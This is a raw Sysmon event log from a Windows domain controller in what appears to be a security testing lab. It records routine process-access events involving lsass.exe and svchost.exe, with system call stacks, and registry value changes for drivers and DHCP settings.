10341000x8000000000000000891Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.478{08A6967A-4287-6000-0C00-000000009A01}588640C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000890Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.478{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000889Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.463{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\NextInstanceDWORD (0x0000001f) 13241300x8000000000000000888Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.463{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\CountDWORD (0x0000001f) 13241300x8000000000000000887Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.463{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\30UMB\UMB\1&841921d&0&TERMINPUT_BUS 13241300x8000000000000000886Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.463{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\NextInstanceDWORD (0x00000002) 13241300x8000000000000000885Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.463{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\CountDWORD (0x00000002) 13241300x8000000000000000884Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.463{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\1UMB\UMB\1&841921d&0&TERMINPUT_BUS 10341000x8000000000000000883Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.463{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000882Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.463{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000881Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.447{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000880Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.447{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000879Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.447{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000878Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.447{08A6967A-4286-6000-0A00-000000009A01}8441120C:\Windows\system32\services.exe{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000877Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.447{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000876Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.447{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-0E00-000000009A01}1076C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000875Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.447{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000874Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.447{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000873Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.447{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000872Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.447{08A6967A-4286-6000-0A00-000000009A01}8441220C:\Windows\system32\services.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000871Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.432{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000870Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.432{08A6967A-4286-6000-0A00-000000009A01}8441112C:\Windows\system32\services.exe{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+52f1|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000869Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.432{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000868Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.432{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000867Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.432{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000866Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.432{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000865Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.432{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000864Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.432{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000863Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.432{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\wcifs\Parameters\WppRecorder_TraceGuid{803cb23a-e32b-4200-bd82-d8a15919ac1b} 13241300x8000000000000000862Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.400{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpConnForceBroadcastFlagDWORD (0x00000000) 13241300x8000000000000000861Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.400{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\IsServerNapAwareDWORD (0x00000000) 13241300x8000000000000000860Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.400{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\AddressTypeDWORD (0x00000000) 13241300x8000000000000000859Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.400{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\LeaseTerminatesTimeDWORD (0x60005098) 13241300x8000000000000000858Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.400{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\T2DWORD (0x60004ed6) 